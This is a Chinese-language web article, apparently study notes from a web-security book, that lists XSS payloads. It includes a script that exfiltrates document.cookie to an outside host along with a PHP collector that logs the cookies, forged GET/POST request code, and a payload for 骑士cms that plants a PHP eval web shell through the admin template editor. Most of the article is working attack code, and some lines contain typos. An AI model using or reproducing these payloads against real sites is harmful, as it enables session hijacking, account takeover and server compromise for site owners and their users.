选择风格

当前位置：首页 >> 网络通讯 >> 网络安全 >> 内容

xss payload

时间：2013/4/19 12:09:00 作者：平凡之路　来源：xuhantao.com 浏览：

xss payload可以使用富客户端文本书写，涛涛电脑知识网，大多数用javascript，涛涛电脑知识网，少部分用actionscript等等。

1.盗取cookie，发起cookie劫持

使用xss漏洞插入cookie.js

cookie.js代码：

view sourceprint?1 var img = document.createElement("img");

3 img.src = " www.2cto.com /cookie.php?cookie="+escape(documents.cookie);

5 document.body.appendChild(img);

cookie.php代码

view sourceprint?1 <?php

3 $file = fopen("cookie.txt","a");

5 fwrite($file,$_GET['cookie']);

7 fclose($file);

9 ?>

2.构造GET和POST请求

get.js代码：

view sourceprint?1 var img = document.createElement("img");

3 img.src = "一个可以使用的get请求链接";

5 document.body.appendChild(img);

post.js代码：

代码1：(DOM节点方式)

view sourceprint?01 var f = document.createElement("form");

03 f.action ="";

05 f.method = "post";

07 document.body.appendChild(f);

09 var i1 = document.createElement("input");

11 i1.name = "xxx";

13 i1.value = "xxxx";

15 f.appendChild(i1);

17 var i2 = document.createElement("input");

19 i2.name = "aaa";

21 i2.value = "aaa";

23 f.appendChild(i2);

25 f.submit();

代码2：

view sourceprint?1 var dd = document.createElement("div");

3 document.body.appendChild(dd);

5 dd.innerHTML ='<form action="" method="post" id="xssform" name="mbform">'+'<input type="hidden" value="xxxx" name="xxx" />'+'<input type="text" value="aaaa" name="aaa" />'+'</form>';

7 document.getElementById("xssform").submit();

代码3：(使用XMLHttpRequest)

view sourceprint?01 var url = "";

03 var postStr = "aaa=aaaa&xxx=xxxx";

05 var ajax = null;

07 if(windows.XMLHttpRequest)

09 {

11 ajax = new XMLHttpRequest();

13 }

15 else if(window.ActiveXObject)

17 {

19 ajax = new ActiveXObject("Microsoft.XMLHTTP");//ie6和一下老版本

21 }

23 else

25 {

27 return;

29 }

31 ajax.open("POST", url , true);

33 ajax.setRequestHeader("Content-Type","application/x-www-form-urlencoded");

35 ajax.send(postStr);

37 //ajax.open("GET", url, true);

39 //ajax.send(null);

41 ajax.onreadystatechange = function()

43 {

45 if(ajax.readyState == 4 && ajax.status == 200)

47 {

49 //alert("Done!");

51 }

53 }

-------------------

3.xss钓鱼

4.浏览器识别和用户安装软件识别

5.css history hack

读《白帽子讲web安全》笔记

---------------------

xxs payload getshell 实例：

骑士cms getshell

view sourceprint?01 //构造好的能写入一句话的连接

03 var Shelldata='tpl_content=%3C%3Fphp%20eval%28%24_POST%5Bxdxd%5D%29%3F%3E&tpl_dir=default&tpl_name=footer.php&del_Submit=%B1%A3%B4%E6';

05 try

07 {

09 //调用XMLHttpRequest

10 var xml = window.XMLHttpRequest ? (new XMLHttpRequest()) : (new ActiveXObject('Microsoft.XMLHTTP'));

12 xml.open("POST",'admin_templates.php?act=do_edit',false);

13 xml.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');

14 xml.onreadystatechange = function()

15 {

16 if(xml.readyState == 4)

18 {

20 }

21 }

22 xml.send(Shelldata);

23 }

24 catch(e)

26 {

28 }

作者 L.N的博客

上一篇：细谈Web系统安装程序安全

下一篇：从对一个安全产品的测试看产品架构安全

没有相关文章

本类热门

本类推荐

本类固顶

暂无信息

部分内容来自网络，如有侵权请联系站长尽快处理站长QQ:965898558(广告及站内业务受理)

xss payload

时间：2013/4/19 12:09:00 作者：平凡之路 来源：xuhantao.com 浏览：

相关文章

本类热门

本类推荐

本类固顶

时间：2013/4/19 12:09:00 作者：平凡之路　来源：xuhantao.com 浏览：